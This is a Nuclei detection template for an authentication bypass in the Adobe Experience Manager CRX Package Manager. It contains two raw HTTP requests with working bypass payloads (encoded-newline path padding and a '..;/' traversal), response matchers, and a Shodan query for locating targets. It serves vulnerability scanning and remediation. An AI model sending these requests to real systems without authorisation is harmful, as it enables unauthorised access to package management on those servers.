nuclei-templates/http/misconfiguration/aem/aem-crx-bypass.yaml

51 lines
1.9 KiB
YAML

id: aem-crx-bypass
info:
name: AEM Package Manager - Authentication Bypass
author: dhiyaneshDK
severity: critical
description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: adobe
product: experience_manager
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe,misconfig
http:
- raw:
- |
GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
- |
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'buildCount'
- 'downloadName'
- 'acHandling'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022059692cee0f0f68e3ffb8761b2696aa4145170f05bbb6a90bb6e5208a3bbdfb41022100a4baced99da62743ddad64553d56b6e14b7963791e3a50c067764c0f23568526:922c64590222798bb761d5b6d8e72950